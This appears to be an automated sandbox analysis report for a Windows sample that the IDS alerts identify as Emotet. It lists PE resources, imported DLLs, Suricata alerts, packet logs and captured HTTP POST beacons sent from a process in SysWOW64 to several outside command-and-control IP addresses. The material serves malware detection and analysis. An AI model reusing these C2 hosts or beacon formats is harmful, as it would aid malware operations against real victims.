                                                                RT_STRING0x740e80xacdataEnglishUnited States0.45348837209302323
                                                                RT_STRING0x74ec80xdedataEnglishUnited States0.536036036036036
                                                                RT_STRING0x747980x4c4dataEnglishUnited States0.3221311475409836
                                                                RT_STRING0x74c600x264dataEnglishUnited States0.3741830065359477
                                                                RT_STRING0x74fa80x2cdataEnglishUnited States0.5227272727272727
                                                                RT_STRING0x750680x42dataEnglishUnited States0.6060606060606061
                                                                RT_RCDATA0x41f780x2fb33dataEnglishUnited States0.9851979997850332
                                                                RT_GROUP_CURSOR0x723b80x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                RT_GROUP_CURSOR0x72ba80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x725180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x72a580x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x729080x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x732380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x727b80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x72e480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x726680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x72cf80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x72f980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x730e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x733880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x734d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x736280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_ICON0x41f500x22dataEnglishUnited States1.0
                                                                RT_VERSION0x71ee00x2e4dataEnglishUnited States0.46216216216216216

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllVirtualQuery, GetStartupInfoA, GetCommandLineA, ExitProcess, TerminateProcess, HeapReAlloc, HeapSize, HeapDestroy, HeapCreate, VirtualFree, IsBadWritePtr, SetUnhandledExceptionFilter, GetStdHandle, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetSystemInfo, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetTimeZoneInformation, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, IsBadReadPtr, IsBadCodePtr, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, SetStdHandle, SetEnvironmentVariableA, GetLocaleInfoW, VirtualProtect, HeapFree, RtlUnwind, HeapAlloc, GetTickCount, SetErrorMode, GetOEMCP, GetCPInfo, GlobalFlags, InterlockedIncrement, WritePrivateProfileStringA, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, GetFileTime, GetFileAttributesA, FileTimeToLocalFileTime, FileTimeToSystemTime, DeleteCriticalSection, InitializeCriticalSection, RaiseException, CreateFileA, GetFullPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, InterlockedDecrement, MulDiv, FormatMessageA, LocalFree, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, lstrcpynA, GlobalUnlock, GlobalFree, FreeResource, CloseHandle, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, GlobalLock, GlobalAlloc, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, GetModuleHandleA, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, FreeLibrary, SetLastError, CompareStringW, CompareStringA, lstrlenA, lstrcmpiA, GetVersion, GetLastError, MultiByteToWideChar, WideCharToMultiByte, FindResourceA, LoadResource, LockResource, SizeofResource, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, InterlockedExchange, LoadLibraryA, GetProcAddress, SetHandleCount, VirtualAlloc
                                                                USER32.dllPostThreadMessageA, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, SetFocus, IsChild, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, GetSubMenu, GetMenuItemID, GetMenuItemCount, GetSysColor, AdjustWindowRectEx, EqualRect, GetClassInfoA, RegisterClassA, UnregisterClassA, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, GetNextDlgGroupItem, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, RegisterClipboardFormatA, PtInRect, GetWindow, SetWindowContextHelpId, MapDialogRect, SetWindowPos, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, SetMenuItemBitmaps, GetFocus, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, GetActiveWindow, IsWindowVisible, GetKeyState, GetCursorPos, ValidateRect, MessageBoxA, DestroyMenu, InvalidateRgn, InvalidateRect, CopyAcceleratorTableA, SetRect, IsRectEmpty, CharNextA, GetSysColorBrush, ReleaseCapture, LoadCursorA, GetParent, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, SetCursor, PostQuitMessage, PostMessageA, PeekMessageA, DispatchMessageA, CharUpperA, MessageBeep, GetSystemMetrics, LoadIconA, EnableWindow, KillTimer, SetTimer, GetClientRect, IsIconic, GetSystemMenu, SendMessageA, AppendMenuA, DrawIcon, CopyRect, SetCapture, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, wsprintfA, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, SetWindowLongA
                                                                GDI32.dllDeleteObject, GetViewportExtEx, GetWindowExtEx, PtVisible, RectVisible, TextOutA, Escape, SelectObject, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, ExtSelectClipRgn, GetStockObject, GetBkColor, GetTextColor, CreateRectRgnIndirect, GetRgnBox, GetMapMode, SetMapMode, RestoreDC, SaveDC, ExtTextOutA, GetDeviceCaps, GetObjectA, SetBkColor, SetTextColor, GetClipBox, DeleteDC, CreateBitmap
                                                                comdlg32.dllGetFileTitleA
                                                                WINSPOOL.DRVDocumentPropertiesA, ClosePrinter, OpenPrinterA
                                                                ADVAPI32.dllRegQueryValueExA, RegOpenKeyExA, RegDeleteKeyA, RegEnumKeyA, RegOpenKeyA, RegQueryValueA, RegCreateKeyExA, RegSetValueExA, RegCloseKey
                                                                COMCTL32.dll
                                                                SHLWAPI.dllPathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
                                                                oledlg.dll
                                                                ole32.dllStgOpenStorageOnILockBytes, CoRevokeClassObject, CLSIDFromProgID, CLSIDFromString, CoTaskMemFree, CoTaskMemAlloc, CoGetClassObject, StgCreateDocfileOnILockBytes, CreateILockBytesOnHGlobal, OleUninitialize, CoFreeUnusedLibraries, OleInitialize, CoRegisterMessageFilter, OleFlushClipboard, OleIsCurrentClipboard
                                                                OLEAUT32.dllSysFreeString, VariantClear, VariantChangeType, VariantInit, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy, SysAllocStringLen
                                                                WS2_32.dllWSACleanup, closesocket, accept, socket, select, gethostbyname, htonl, htons, inet_addr, bind, WSAGetLastError, WSASetLastError, WSAStartup, sendto, recvfrom, WSAAsyncSelect, send, recv, listen, connect

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                                2024-08-20T19:11:56.438207+0200TCP2035077ET MALWARE Win32/Emotet CnC Activity (POST) M1114974780192.168.2.674.214.230.200
                                                                2024-08-20T19:09:53.067014+0200TCP2035077ET MALWARE Win32/Emotet CnC Activity (POST) M11149749443192.168.2.6194.187.133.160
                                                                2024-08-20T19:11:31.533291+0200TCP2035077ET MALWARE Win32/Emotet CnC Activity (POST) M111497458080192.168.2.6103.86.49.11
                                                                2024-08-20T19:10:28.346788+0200TCP2035077ET MALWARE Win32/Emotet CnC Activity (POST) M1114973080192.168.2.688.153.35.32
                                                                2024-08-20T19:10:55.327152+0200TCP2035077ET MALWARE Win32/Emotet CnC Activity (POST) M111497397080192.168.2.6173.212.214.235
                                                                2024-08-20T19:11:07.013000+0200TCP2035077ET MALWARE Win32/Emotet CnC Activity (POST) M111497427080192.168.2.6121.124.124.40
                                                                2024-08-20T19:10:52.310016+0200TCP2035077ET MALWARE Win32/Emotet CnC Activity (POST) M111497358080192.168.2.6107.170.146.252
                                                                2024-08-20T19:11:00.118321+0200TCP2035077ET MALWARE Win32/Emotet CnC Activity (POST) M111497408080192.168.2.6167.114.153.111

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Aug 20, 2024 19:10:06.949390888 CEST4973080192.168.2.688.153.35.32
                                                                Aug 20, 2024 19:10:06.954781055 CEST804973088.153.35.32192.168.2.6
                                                                Aug 20, 2024 19:10:06.954853058 CEST4973080192.168.2.688.153.35.32
                                                                Aug 20, 2024 19:10:06.954998016 CEST4973080192.168.2.688.153.35.32
                                                                Aug 20, 2024 19:10:06.955037117 CEST4973080192.168.2.688.153.35.32
                                                                Aug 20, 2024 19:10:06.959852934 CEST804973088.153.35.32192.168.2.6
                                                                Aug 20, 2024 19:10:06.959886074 CEST804973088.153.35.32192.168.2.6
                                                                Aug 20, 2024 19:10:06.959923983 CEST804973088.153.35.32192.168.2.6
                                                                Aug 20, 2024 19:10:06.959934950 CEST804973088.153.35.32192.168.2.6
                                                                Aug 20, 2024 19:10:06.959944963 CEST804973088.153.35.32192.168.2.6
                                                                Aug 20, 2024 19:10:28.346565008 CEST804973088.153.35.32192.168.2.6
                                                                Aug 20, 2024 19:10:28.346787930 CEST4973080192.168.2.688.153.35.32
                                                                Aug 20, 2024 19:10:28.350147009 CEST4973080192.168.2.688.153.35.32
                                                                Aug 20, 2024 19:10:28.355870962 CEST804973088.153.35.32192.168.2.6
                                                                Aug 20, 2024 19:10:30.925040007 CEST497358080192.168.2.6107.170.146.252
                                                                Aug 20, 2024 19:10:30.931057930 CEST808049735107.170.146.252192.168.2.6
                                                                Aug 20, 2024 19:10:30.931142092 CEST497358080192.168.2.6107.170.146.252
                                                                Aug 20, 2024 19:10:30.931354046 CEST497358080192.168.2.6107.170.146.252
                                                                Aug 20, 2024 19:10:30.931421041 CEST497358080192.168.2.6107.170.146.252
                                                                Aug 20, 2024 19:10:30.939270020 CEST808049735107.170.146.252192.168.2.6
                                                                Aug 20, 2024 19:10:30.939280987 CEST808049735107.170.146.252192.168.2.6
                                                                Aug 20, 2024 19:10:30.939287901 CEST808049735107.170.146.252192.168.2.6
                                                                Aug 20, 2024 19:10:30.941484928 CEST808049735107.170.146.252192.168.2.6
                                                                Aug 20, 2024 19:10:30.941495895 CEST808049735107.170.146.252192.168.2.6
                                                                Aug 20, 2024 19:10:52.309874058 CEST808049735107.170.146.252192.168.2.6
                                                                Aug 20, 2024 19:10:52.310015917 CEST497358080192.168.2.6107.170.146.252
                                                                Aug 20, 2024 19:10:52.310096025 CEST497358080192.168.2.6107.170.146.252
                                                                Aug 20, 2024 19:10:52.314894915 CEST808049735107.170.146.252192.168.2.6
                                                                Aug 20, 2024 19:10:54.673186064 CEST497397080192.168.2.6173.212.214.235
                                                                Aug 20, 2024 19:10:54.678270102 CEST708049739173.212.214.235192.168.2.6
                                                                Aug 20, 2024 19:10:54.678338051 CEST497397080192.168.2.6173.212.214.235
                                                                Aug 20, 2024 19:10:54.678457975 CEST497397080192.168.2.6173.212.214.235
                                                                Aug 20, 2024 19:10:54.678488016 CEST497397080192.168.2.6173.212.214.235
                                                                Aug 20, 2024 19:10:54.684120893 CEST708049739173.212.214.235192.168.2.6
                                                                Aug 20, 2024 19:10:54.684130907 CEST708049739173.212.214.235192.168.2.6
                                                                Aug 20, 2024 19:10:54.684139013 CEST708049739173.212.214.235192.168.2.6
                                                                Aug 20, 2024 19:10:54.685502052 CEST708049739173.212.214.235192.168.2.6
                                                                Aug 20, 2024 19:10:54.685511112 CEST708049739173.212.214.235192.168.2.6
                                                                Aug 20, 2024 19:10:55.327039003 CEST708049739173.212.214.235192.168.2.6
                                                                Aug 20, 2024 19:10:55.327152014 CEST497397080192.168.2.6173.212.214.235
                                                                Aug 20, 2024 19:10:58.703808069 CEST497408080192.168.2.6167.114.153.111
                                                                Aug 20, 2024 19:10:58.708853006 CEST808049740167.114.153.111192.168.2.6
                                                                Aug 20, 2024 19:10:58.708939075 CEST497408080192.168.2.6167.114.153.111
                                                                Aug 20, 2024 19:10:58.709069014 CEST497408080192.168.2.6167.114.153.111
                                                                Aug 20, 2024 19:10:58.709096909 CEST497408080192.168.2.6167.114.153.111
                                                                Aug 20, 2024 19:10:58.713998079 CEST808049740167.114.153.111192.168.2.6
                                                                Aug 20, 2024 19:10:58.714062929 CEST808049740167.114.153.111192.168.2.6
                                                                Aug 20, 2024 19:10:58.714071989 CEST808049740167.114.153.111192.168.2.6
                                                                Aug 20, 2024 19:10:58.714080095 CEST808049740167.114.153.111192.168.2.6
                                                                Aug 20, 2024 19:10:58.715401888 CEST808049740167.114.153.111192.168.2.6
                                                                Aug 20, 2024 19:11:00.118257046 CEST808049740167.114.153.111192.168.2.6
                                                                Aug 20, 2024 19:11:00.118320942 CEST497408080192.168.2.6167.114.153.111
                                                                Aug 20, 2024 19:11:00.118386030 CEST497408080192.168.2.6167.114.153.111
                                                                Aug 20, 2024 19:11:00.123850107 CEST808049740167.114.153.111192.168.2.6
                                                                Aug 20, 2024 19:11:00.321774960 CEST708049739173.212.214.235192.168.2.6
                                                                Aug 20, 2024 19:11:00.321861029 CEST497397080192.168.2.6173.212.214.235
                                                                Aug 20, 2024 19:11:02.433124065 CEST49741443192.168.2.667.170.250.203
                                                                Aug 20, 2024 19:11:02.433195114 CEST4434974167.170.250.203192.168.2.6
                                                                Aug 20, 2024 19:11:02.433273077 CEST49741443192.168.2.667.170.250.203
                                                                Aug 20, 2024 19:11:02.433474064 CEST49741443192.168.2.667.170.250.203
                                                                Aug 20, 2024 19:11:02.433490992 CEST4434974167.170.250.203192.168.2.6
                                                                Aug 20, 2024 19:11:02.433516979 CEST49741443192.168.2.667.170.250.203
                                                                Aug 20, 2024 19:11:02.433523893 CEST4434974167.170.250.203192.168.2.6
                                                                Aug 20, 2024 19:11:02.433558941 CEST4434974167.170.250.203192.168.2.6
                                                                Aug 20, 2024 19:11:05.068944931 CEST497427080192.168.2.6121.124.124.40
                                                                Aug 20, 2024 19:11:05.078578949 CEST708049742121.124.124.40192.168.2.6
                                                                Aug 20, 2024 19:11:05.078685045 CEST497427080192.168.2.6121.124.124.40
                                                                Aug 20, 2024 19:11:05.081152916 CEST497427080192.168.2.6121.124.124.40
                                                                Aug 20, 2024 19:11:05.081254005 CEST497427080192.168.2.6121.124.124.40
                                                                Aug 20, 2024 19:11:05.086302996 CEST708049742121.124.124.40192.168.2.6
                                                                Aug 20, 2024 19:11:05.086337090 CEST708049742121.124.124.40192.168.2.6
                                                                Aug 20, 2024 19:11:05.086349010 CEST708049742121.124.124.40192.168.2.6
                                                                Aug 20, 2024 19:11:05.086380005 CEST708049742121.124.124.40192.168.2.6
                                                                Aug 20, 2024 19:11:05.087517977 CEST708049742121.124.124.40192.168.2.6
                                                                Aug 20, 2024 19:11:07.012852907 CEST708049742121.124.124.40192.168.2.6
                                                                Aug 20, 2024 19:11:07.013000011 CEST497427080192.168.2.6121.124.124.40
                                                                Aug 20, 2024 19:11:07.013031960 CEST497427080192.168.2.6121.124.124.40
                                                                Aug 20, 2024 19:11:07.021037102 CEST708049742121.124.124.40192.168.2.6
                                                                Aug 20, 2024 19:11:10.162195921 CEST497458080192.168.2.6103.86.49.11
                                                                Aug 20, 2024 19:11:10.167212963 CEST808049745103.86.49.11192.168.2.6
                                                                Aug 20, 2024 19:11:10.167280912 CEST497458080192.168.2.6103.86.49.11
                                                                Aug 20, 2024 19:11:10.167423010 CEST497458080192.168.2.6103.86.49.11
                                                                Aug 20, 2024 19:11:10.167495012 CEST497458080192.168.2.6103.86.49.11
                                                                Aug 20, 2024 19:11:10.172965050 CEST808049745103.86.49.11192.168.2.6
                                                                Aug 20, 2024 19:11:10.172991991 CEST808049745103.86.49.11192.168.2.6
                                                                Aug 20, 2024 19:11:10.173003912 CEST808049745103.86.49.11192.168.2.6
                                                                Aug 20, 2024 19:11:10.173016071 CEST808049745103.86.49.11192.168.2.6
                                                                Aug 20, 2024 19:11:10.173372030 CEST808049745103.86.49.11192.168.2.6
                                                                Aug 20, 2024 19:11:31.533180952 CEST808049745103.86.49.11192.168.2.6
                                                                Aug 20, 2024 19:11:31.533291101 CEST497458080192.168.2.6103.86.49.11
                                                                Aug 20, 2024 19:11:31.533406973 CEST497458080192.168.2.6103.86.49.11
                                                                Aug 20, 2024 19:11:31.538299084 CEST808049745103.86.49.11192.168.2.6
                                                                Aug 20, 2024 19:11:35.079536915 CEST4974780192.168.2.674.214.230.200
                                                                Aug 20, 2024 19:11:35.084547997 CEST804974774.214.230.200192.168.2.6
                                                                Aug 20, 2024 19:11:35.084620953 CEST4974780192.168.2.674.214.230.200
                                                                Aug 20, 2024 19:11:35.085169077 CEST4974780192.168.2.674.214.230.200
                                                                Aug 20, 2024 19:11:35.085203886 CEST4974780192.168.2.674.214.230.200
                                                                Aug 20, 2024 19:11:35.090039015 CEST804974774.214.230.200192.168.2.6
                                                                Aug 20, 2024 19:11:35.090065956 CEST804974774.214.230.200192.168.2.6
                                                                Aug 20, 2024 19:11:35.090143919 CEST804974774.214.230.200192.168.2.6
                                                                Aug 20, 2024 19:11:35.090153933 CEST804974774.214.230.200192.168.2.6
                                                                Aug 20, 2024 19:11:35.090162992 CEST804974774.214.230.200192.168.2.6
                                                                Aug 20, 2024 19:11:56.438079119 CEST804974774.214.230.200192.168.2.6
                                                                Aug 20, 2024 19:11:56.438206911 CEST4974780192.168.2.674.214.230.200
                                                                Aug 20, 2024 19:11:56.438340902 CEST4974780192.168.2.674.214.230.200
                                                                Aug 20, 2024 19:11:56.443981886 CEST804974774.214.230.200192.168.2.6
                                                                Aug 20, 2024 19:11:56.911058903 CEST497397080192.168.2.6173.212.214.235
                                                                Aug 20, 2024 19:11:56.916163921 CEST708049739173.212.214.235192.168.2.6
                                                                Aug 20, 2024 19:11:59.081245899 CEST49749443192.168.2.6194.187.133.160
                                                                Aug 20, 2024 19:11:59.081304073 CEST44349749194.187.133.160192.168.2.6
                                                                Aug 20, 2024 19:11:59.081392050 CEST49749443192.168.2.6194.187.133.160
                                                                Aug 20, 2024 19:11:59.081681013 CEST49749443192.168.2.6194.187.133.160
                                                                Aug 20, 2024 19:11:59.081702948 CEST44349749194.187.133.160192.168.2.6
                                                                Aug 20, 2024 19:11:59.081722975 CEST49749443192.168.2.6194.187.133.160
                                                                Aug 20, 2024 19:11:59.081732035 CEST44349749194.187.133.160192.168.2.6
                                                                Aug 20, 2024 19:11:59.081748009 CEST44349749194.187.133.160192.168.2.6

                                                                HTTP Request Dependency Graph

                                                                • 88.153.35.32
                                                                • 107.170.146.252
                                                                  • 107.170.146.252:8080
                                                                • 173.212.214.235
                                                                  • 173.212.214.235:7080
                                                                • 167.114.153.111
                                                                  • 167.114.153.111:8080
                                                                • 67.170.250.203
                                                                  • 67.170.250.203:443
                                                                • 121.124.124.40
                                                                  • 121.124.124.40:7080
                                                                • 103.86.49.11
                                                                  • 103.86.49.11:8080
                                                                • 74.214.230.200
                                                                • 194.187.133.160
                                                                  • 194.187.133.160:443

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.64973088.153.35.3280424C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Aug 20, 2024 19:10:06.954998016 CEST560OUTPOST /LqhsCyik6x/yDMw9sEc7al9N/WQVwtBBo/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 88.153.35.32/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=--------------oxhn8YFF02lqHF
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 88.153.35.32
                                                                Content-Length: 4628
                                                                Cache-Control: no-cache
                                                                Aug 20, 2024 19:10:06.955037117 CEST4628OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6f 78 68 6e 38 59 46 46 30 32 6c 71 48 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6a 61 75 63 75 69 78 76 73 22
                                                                Data Ascii: ----------------oxhn8YFF02lqHFContent-Disposition: form-data; name="jaucuixvs"; filename="gkslbfaphs"Content-Type: application/octet-streamirENcJxh;GeBaP$uLB>&N~2*)^U_ItKO6(0/7]


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.649735107.170.146.2528080424C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Aug 20, 2024 19:10:30.931354046 CEST572OUTPOST /59QulnlrGjN3xHL/Y0uv73jS/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 107.170.146.252/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=-------------------GLzKnj3AY6lNu0XkAPz
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 107.170.146.252:8080
                                                                Content-Length: 4628
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.649739173.212.214.2357080424C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Aug 20, 2024 19:10:54.678457975 CEST559OUTPOST /R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 173.212.214.235/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=---------8eRw1EpsQ
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 173.212.214.235:7080
                                                                Content-Length: 4628
                                                                Cache-Control: no-cache
                                                                Aug 20, 2024 19:10:55.327039003 CEST431INHTTP/1.1 404 Not Found
                                                                Date: Tue, 20 Aug 2024 17:10:55 GMT
                                                                Server: Apache
                                                                Content-Length: 230
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 52 33 30 5a 53 2f 4b 73 34 56 68 2f 64 37 33 54 63 37 34 77 34 47 4a 52 2f 43 7a 65 68 56 4f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /R30ZS/Ks4Vh/d73Tc74w4GJR/CzehVO/ was not found on this server.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.649740167.114.153.1118080424C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Aug 20, 2024 19:10:58.709069014 CEST559OUTPOST /IIFe/1yJDM9EkbiP8R7/XHAjzKH0LnedA/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 167.114.153.111/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=--------kYHRLcw3
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 167.114.153.111:8080
                                                                Content-Length: 4628
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.64974167.170.250.203443424C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Aug 20, 2024 19:11:02.433474064 CEST607OUTPOST /vE1qWiF8GUO/OKiMtdK9y/9BlkbfHs/KSvjvc1is4hq83x0Q/qTFsKaNJ2QVx5a/KqpZ4e/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 67.170.250.203/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=---------------Eoyapxu02W4DrmN
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 67.170.250.203:443
                                                                Content-Length: 4628
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.649742121.124.124.407080424C:\Windows\SysWOW64\KBDTZM\mibincodec.exe
                                                                TimestampBytes transferredDirectionData
                                                                Aug 20, 2024 19:11:05.081152916 CEST552OUTPOST /gLDpms1fYdKy/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate
                                                                DNT: 1
                                                                Connection: keep-alive
                                                                Referer: 121.124.124.40/
                                                                Upgrade-Insecure-Requests: 1
                                                                Content-Type: multipart/form-data; boundary=----------------xQkdZnrmTvVZqhGU
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                Host: 121.124.124.40:7080
                                                                Content-Length: 4628
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
